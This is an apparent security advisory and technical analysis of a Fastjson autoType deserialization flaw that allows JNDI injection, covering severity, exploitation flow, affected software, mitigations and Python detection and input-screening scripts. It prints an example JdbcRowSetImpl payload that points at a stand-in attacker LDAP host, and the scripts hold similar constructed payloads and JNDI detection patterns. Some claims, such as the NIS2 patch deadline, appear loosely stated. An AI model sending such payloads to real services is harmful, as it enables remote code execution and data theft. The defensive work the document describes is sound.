Description
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
EPSS Score: 0%
Comprehensive Technical Analysis of EUVD-2026-1694 (Fastjson AutoType Remote Code Execution Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
EUVD-2026-1694 (CVE-2025-70974) is a critical remote code execution (RCE) vulnerability in Fastjson, a widely used Java JSON parsing library. The flaw stems from insecure deserialization via the autoType feature, which allows attackers to instantiate arbitrary Java classes and execute malicious payloads through JNDI (Java Naming and Directory Interface) injection.
Severity Metrics (CVSS v3.1)
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 10.0 (Critical) | Maximum severity due to unauthenticated RCE with high impact on confidentiality, integrity, and availability. |
| Attack Vector (AV:N) | Network | Exploitable remotely over the internet. |
| Attack Complexity (AC:L) | Low | No special conditions required; straightforward exploitation. |
| Privileges Required (PR:N) | None | No authentication needed. |
| User Interaction (UI:N) | None | Exploitation does not require user interaction. |
| Scope (S:C) | Changed | Affects components beyond the vulnerable system (e.g., LDAP/RMI servers). |
| Confidentiality (C:H) | High | Attacker can exfiltrate sensitive data. |
| Integrity (I:H) | High | Attacker can modify system state or data. |
| Availability (A:H) | High | Attacker can crash or disable the system. |
Historical Context & Incomplete Fixes
- CVE-2017-18349 (original `autoType` bypass) was partially patched, but subsequent bypasses emerged.
- CVE-2022-25845 introduced a new bypass technique, demonstrating that `autoType` restrictions were insufficient.
- EUVD-2026-1694 represents a regression or incomplete fix, allowing attackers to exploit `autoType` again via JNDI injection in Fastjson versions before 1.2.48.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
- JSON Payload with `@type` Key
  - Attacker sends a crafted JSON payload containing an `@type` field specifying a malicious Java class (e.g., `com.sun.rowset.JdbcRowSetImpl`).
  - Example payload: `{ "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://attacker.com:1389/Exploit", "autoCommit": true }`
- JNDI Lookup & Remote Code Execution
  - Fastjson deserializes the payload and instantiates the specified class.
  - The `JdbcRowSetImpl` class performs a JNDI lookup, fetching a malicious Java object from an attacker-controlled LDAP/RMI server.
  - The attacker's server returns a serialized payload (e.g., a `javax.el.ELProcessor` or `groovy.lang.GroovyShell` exploit), leading to arbitrary code execution.
- Alternative Exploitation Paths
  - Log4Shell-like Attacks: If Fastjson is used in logging frameworks, attackers can inject JNDI payloads via log entries.
  - Supply Chain Attacks: Compromised dependencies (e.g., vulnerable libraries using Fastjson) can be leveraged.
  - Web Application Exploits: APIs or web services parsing untrusted JSON input are prime targets.
Real-World Exploitation (2023–2025)
- AndroxGh0st Malware: Exploited Fastjson in US university systems to deploy C2 (Command & Control) loggers.
- CloudSEK Report: Documented active exploitation in the wild, targeting misconfigured Fastjson instances.
- Vulhub Proof-of-Concept (PoC): Demonstrated RCE via the `1.2.47-rce` exploit.
3. Affected Systems and Software Versions
Vulnerable Versions
- Fastjson versions < 1.2.48 (all prior releases).
- Applications using Fastjson for JSON parsing, including:
  - Web applications (Java Spring, Apache Struts, etc.).
  - Microservices and APIs.
  - Big data platforms (Hadoop, Spark).
  - Enterprise middleware (Apache Kafka, Dubbo).
Notable Dependencies at Risk
| Software | Risk Level | Notes |
|---|---|---|
| Apache Dubbo | High | Uses Fastjson for serialization. |
| Alibaba Nacos | High | Configuration management tool. |
| Spring Boot (if Fastjson is used) | Medium | Defaults to Jackson, but custom configs may use Fastjson. |
| Hadoop Ecosystem | Medium | Some components rely on Fastjson. |
4. Recommended Mitigation Strategies
Immediate Actions
- Upgrade Fastjson
  - Patch to version 1.2.48 or later (latest stable release).
  - Verify no vulnerable versions remain in dependencies (`mvn dependency:tree` or `gradle dependencies`).
- Disable `autoType` (If Upgrade is Not Possible)
  - Set `fastjson.parser.autoTypeSupport=false` in configuration.
  - Example (Java): `ParserConfig.getGlobalInstance().setAutoTypeSupport(false);`
  - Warning: Some applications may break if they rely on `autoType`.
- Implement Input Validation
  - Whitelist allowed classes for deserialization.
  - Reject JSON with `@type` unless explicitly required.
- Network-Level Protections
  - Block outbound JNDI/LDAP/RMI traffic (e.g., via firewall rules).
  - Use Web Application Firewalls (WAFs) to filter malicious JSON payloads.
- Runtime Protections
  - Java Security Manager: Restrict reflective access and JNDI lookups.
  - RASP (Runtime Application Self-Protection): Detect and block deserialization attacks.
Long-Term Recommendations
- Replace Fastjson with safer alternatives (e.g., Jackson, Gson, or Moshi).
- Conduct dependency audits to identify and remediate vulnerable libraries.
- Monitor for exploitation attempts (e.g., unusual JNDI lookups in logs).
5. Impact on European Cybersecurity Landscape
Threat Landscape in the EU
- Critical Infrastructure at Risk: Fastjson is used in financial services, healthcare, and government systems across the EU.
- Supply Chain Risks: Many European enterprises rely on Alibaba Cloud, Apache projects, and open-source middleware, which may embed Fastjson.
- Regulatory Compliance Concerns:
  - GDPR: Unauthorized access via RCE could lead to data breaches, triggering reporting obligations.
  - NIS2 Directive: Critical entities must patch vulnerabilities within 24–72 hours of disclosure.
  - DORA (Digital Operational Resilience Act): Financial institutions must ensure secure software supply chains.
Recent EU Incidents
- 2024–2025: Multiple European universities and research institutions reported Fastjson-related breaches.
- ENISA Threat Reports: Highlighted JNDI injection as a persistent threat in the EU, with Fastjson being a top vector.
Mitigation Challenges in the EU
- Legacy Systems: Many EU organizations struggle with outdated Java applications that cannot be easily patched.
- Third-Party Dependencies: European companies using Chinese open-source libraries (e.g., Alibaba’s ecosystem) face higher risks.
- Cross-Border Exploitation: Attackers leverage EU-based cloud providers to host malicious JNDI servers.
6. Technical Details for Security Professionals
Root Cause Analysis
- Insecure Deserialization: Fastjson's `autoType` feature blindly instantiates classes specified in `@type` without proper validation.
- JNDI Injection: The `com.sun.rowset.JdbcRowSetImpl` class (and others) performs JNDI lookups, enabling remote code execution.
- Bypass Techniques:
  - CVE-2022-25845: Used class name obfuscation (e.g., `Lcom.sun.rowset.JdbcRowSetImpl;`) to bypass `autoType` blacklists.
  - EUVD-2026-1694: Exploits incomplete blacklist updates in Fastjson 1.2.47.
Exploitation Flow
- Attacker sends malicious JSON with `@type` pointing to a vulnerable class.
- Fastjson deserializes the payload and instantiates the class.
- JNDI lookup is triggered, fetching a malicious object from an attacker-controlled server.
- Remote code execution occurs when the object is deserialized.
Detection & Forensics
- Log Analysis:
  - Look for unexpected JNDI lookups in application logs.
  - Monitor for `@type` fields in JSON input.
- Network Traffic:
  - Detect LDAP/RMI connections to unknown external IPs.
- Memory Forensics:
  - Check for unexpected Java class instantiations in heap dumps.
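The log-analysis and network-traffic checks above can be turned into a small detection pass. The following is an added example, not from the advisory or any vendor product: it scans constructed application log lines for `@type` keys in logged request bodies and for JNDI lookups to hosts outside a known directory-server list, scans constructed connection logs for outbound LDAP/RMI ports on external destinations, and correlates the two so that a lookup which actually produced egress is reported separately. The log layout, the internal address ranges, the known hosts and the address 198.51.100.7 (a documentation address standing in for an attacker-controlled server) are all assumptions.

```python
"""Log-side detection of the JNDI injection indicators listed above.

Added example, not from the advisory or any vendor product. Log lines, field
layout, internal ranges and known directory hosts are constructed.
"""
import ipaddress
import re
from typing import List, Tuple

Alert = Tuple[str, str]  # (indicator name, detail)

# Hypothetical: directory / RMI endpoints the application legitimately talks to.
KNOWN_DIRECTORY_HOSTS = {"ldap.corp.example", "10.0.5.20"}
# LDAP, LDAPS, the unprivileged LDAP port seen in the advisory's payload, RMI registry.
JNDI_PORTS = {389, 636, 1389, 1099, 1098}
# Assumed internal address space (RFC 1918 plus loopback).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# "@type" either literal or in its JSON-escaped spelling.
TYPE_KEY_RE = re.compile(r'"@type"|\\u0040type', re.IGNORECASE)
# Any JNDI-reachable URI; host stops at ':', '/', whitespace or a quote.
JNDI_LOOKUP_RE = re.compile(
    r"(?:ldap|ldaps|rmi|iiop|dns)://(?P<host>[^:/\s\"]+)(?::(?P<port>\d+))?", re.IGNORECASE)
# Constructed connection-log layout: "... src=<ip>:<port> dst=<ip>:<port> ..."
CONN_RE = re.compile(r"src=(?P<src>[\d.]+):\d+\s+dst=(?P<dst>[\d.]+):(?P<dport>\d+)")


def is_external(host: str) -> bool:
    """True unless host is a known directory server or sits in an internal range.

    A bare hostname that is not on the known list is treated as external: the
    attacker chooses the name, so the safe default is to alert.
    """
    if host in KNOWN_DIRECTORY_HOSTS:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True
    return not any(ip in net for net in INTERNAL_NETS)


def scan_app_logs(lines: List[str]) -> List[Alert]:
    """Flag "@type" keys in logged request bodies and JNDI lookups to external hosts."""
    alerts: List[Alert] = []
    for i, line in enumerate(lines):
        if TYPE_KEY_RE.search(line):
            alerts.append(("type-key-in-input", f"line {i}"))
        for m in JNDI_LOOKUP_RE.finditer(line):
            if is_external(m.group("host")):
                alerts.append(("jndi-lookup-external", m.group("host")))
    return alerts


def scan_conn_logs(lines: List[str]) -> List[Alert]:
    """Flag outbound connections to LDAP/RMI ports on hosts outside the network."""
    alerts: List[Alert] = []
    for line in lines:
        m = CONN_RE.search(line)
        if m and int(m.group("dport")) in JNDI_PORTS and is_external(m.group("dst")):
            alerts.append(("outbound-jndi-port", f"{m.group('dst')}:{m.group('dport')}"))
    return alerts


def correlate(app_alerts: List[Alert], conn_alerts: List[Alert]) -> List[str]:
    """Hosts seen both as a JNDI lookup target and as an outbound LDAP/RMI peer.

    A hit here means the lookup was not merely logged but actually left the host.
    """
    looked_up = {detail for kind, detail in app_alerts if kind == "jndi-lookup-external"}
    connected = {detail.rsplit(":", 1)[0] for kind, detail in conn_alerts}
    return sorted(looked_up & connected)


# Constructed sample logs.
APP_LOG = [
    '2025-03-02T10:14:05Z INFO  [http-1] request body={"order":{"id":42}}',
    '2025-03-02T10:14:07Z INFO  [http-2] request body={"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"ldap://198.51.100.7:1389/x"}',
    '2025-03-02T10:14:07Z WARN  [http-2] javax.naming lookup ldap://198.51.100.7:1389/x',
    '2025-03-02T10:15:00Z INFO  [auth-1] javax.naming lookup ldap://ldap.corp.example:389/ou=people',
]
CONN_LOG = [
    '2025-03-02T10:14:07Z conn src=10.0.1.15:50210 dst=198.51.100.7:1389 proto=tcp action=allow',
    '2025-03-02T10:15:00Z conn src=10.0.1.15:50211 dst=10.0.5.20:389 proto=tcp action=allow',
    '2025-03-02T10:16:00Z conn src=10.0.1.15:50212 dst=93.184.216.34:443 proto=tcp action=allow',
]

if __name__ == "__main__":
    app = scan_app_logs(APP_LOG)
    conn = scan_conn_logs(CONN_LOG)
    for kind, detail in app + conn:
        print(f"ALERT {kind}: {detail}")
    print("confirmed egress to:", correlate(app, conn))
```

The legitimate lookup against `ldap.corp.example` and the ordinary HTTPS connection produce no alerts; the `JdbcRowSetImpl` request produces a body alert, two lookup alerts and one egress alert, and `correlate` reduces these to the single external host worth investigating first.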
Proof-of-Concept (PoC) Analysis
- Vulhub's `1.2.47-rce`:
  - Demonstrates RCE via `JdbcRowSetImpl` + LDAP server.
  - Can be adapted for reverse shells, data exfiltration, or lateral movement.
- CloudSEK's AndroxGh0st Report:
  - Shows real-world exploitation in compromised university systems.
Defensive Coding Practices
- Use `safeMode` in Fastjson (if available): `ParserConfig.getGlobalInstance().setSafeMode(true);`
- Implement a custom `TypeHandler` to validate allowed classes.
- Use `JSONPath` or similar tools to sanitize JSON input before parsing.
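Fastjson's own switches (`setAutoTypeSupport(false)`, and `setSafeMode(true)`, which exists from 1.2.68 onward) live inside the Java process; the input-validation items under Immediate Actions (whitelist classes, reject `@type` unless required) and the sanitize-before-parsing point above can additionally be enforced in front of the parser, at a gateway or in the request filter. The following is an added example, not Fastjson's code and not part of the advisory, written in Python as such a pre-parse screen. It decodes the document first, so an escaped key such as `\u0040type` is seen as `@type` (a regex over the raw text would miss it), walks the decoded tree so nested `@type` keys are caught, folds the `Lcom...;` descriptor spelling mentioned above back to the plain class name before the allowlist check, and flags JNDI-style URIs in any string value. The allowlist prefix `com.example.api.dto.`, the sample documents and the address 198.51.100.7 are constructed.

```python
"""Pre-parse screen for untrusted JSON that will be handed to a Fastjson parser.

Added illustration, not Fastjson's code and not part of the advisory. The
allowlist prefix and the sample documents are constructed.
"""
import json
import re
from typing import Iterator, List, Tuple

TYPE_KEY = "@type"

# Hypothetical: the only package this service legitimately deserializes by name.
ALLOWED_TYPE_PREFIXES = ("com.example.api.dto.",)

# URI schemes a JNDI lookup can reach; none belong in ordinary API input.
JNDI_SCHEME_RE = re.compile(r"^\s*(ldap|ldaps|rmi|dns|iiop)://", re.IGNORECASE)


def normalize_class_name(name: str) -> str:
    """Fold the descriptor spelling used in autoType bypasses back to a class name.

    "Lcom.sun.rowset.JdbcRowSetImpl;" (CVE-2022-25845 style) and surrounding
    whitespace denote the same class and must hit the same allowlist check.
    """
    name = name.strip()
    if name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name.strip()


def walk(node: object, path: str = "$") -> Iterator[Tuple[str, str, object]]:
    """Yield (json_path, key, value) for every object member, at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield path, key, value
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from walk(item, f"{path}[{i}]")


def screen_document(raw: str, allowed_prefixes=ALLOWED_TYPE_PREFIXES) -> List[str]:
    """Return findings for a raw JSON text; an empty list means it may be parsed.

    Decoding with the standard json module first means an escaped spelling
    such as "\\u0040type" is already "@type" when the tree is scanned.
    """
    findings: List[str] = []
    try:
        doc = json.loads(raw)
    except ValueError as exc:
        return [f"malformed JSON: {exc}"]
    for path, key, value in walk(doc):
        if key == TYPE_KEY:
            cls = normalize_class_name(value) if isinstance(value, str) else repr(value)
            if not cls.startswith(tuple(allowed_prefixes)):
                findings.append(f"{path}: @type '{cls}' is not allowlisted")
        if isinstance(value, str) and JNDI_SCHEME_RE.match(value):
            findings.append(f"{path}.{key}: JNDI-style URI in value")
    return findings


# Constructed samples: one legitimate request and three hostile shapes.
BENIGN = '{"@type": "com.example.api.dto.Order", "id": 42}'
PLAIN_ATTACK = ('{"@type": "com.sun.rowset.JdbcRowSetImpl", '
                '"dataSourceName": "ldap://198.51.100.7:1389/x", "autoCommit": true}')
DESCRIPTOR_FORM = ('{"@type": "Lcom.sun.rowset.JdbcRowSetImpl;", '
                   '"dataSourceName": "rmi://198.51.100.7:1099/x"}')
NESTED_ESCAPED = '{"order": {"items": [{"\\u0040type": "com.sun.rowset.JdbcRowSetImpl"}]}}'

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("plain", PLAIN_ATTACK),
                       ("descriptor", DESCRIPTOR_FORM), ("nested-escaped", NESTED_ESCAPED)):
        verdict = screen_document(doc)
        print(f"{label:15} -> {'PASS' if not verdict else 'REJECT: ' + '; '.join(verdict)}")
```

A document that yields any finding is dropped before Fastjson ever sees it; the allowlist is deliberately a package prefix rather than a denylist of known gadget classes, because the advisory's own history (an incomplete fix for CVE-2017-18349, then CVE-2022-25845, then this regression) is the record of blacklists being outrun.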
Conclusion
EUVD-2026-1694 (CVE-2025-70974) is a critical RCE vulnerability in Fastjson that poses significant risks to European organizations, particularly those in finance, healthcare, and government. Given its CVSS 10.0 severity and active exploitation in the wild, immediate patching and mitigation are mandatory.
Key Takeaways for Security Teams
✅ Patch Fastjson to ≥1.2.48 or disable autoType.
✅ Monitor for JNDI injection attempts in logs and network traffic.
✅ Conduct dependency audits to identify vulnerable Fastjson instances.
✅ Implement WAF rules to block malicious JSON payloads.
✅ Consider migrating to safer JSON parsers (e.g., Jackson).
Failure to address this vulnerability could result in data breaches, ransomware attacks, or regulatory penalties under GDPR, NIS2, and DORA. Organizations should treat this as a top-priority security issue.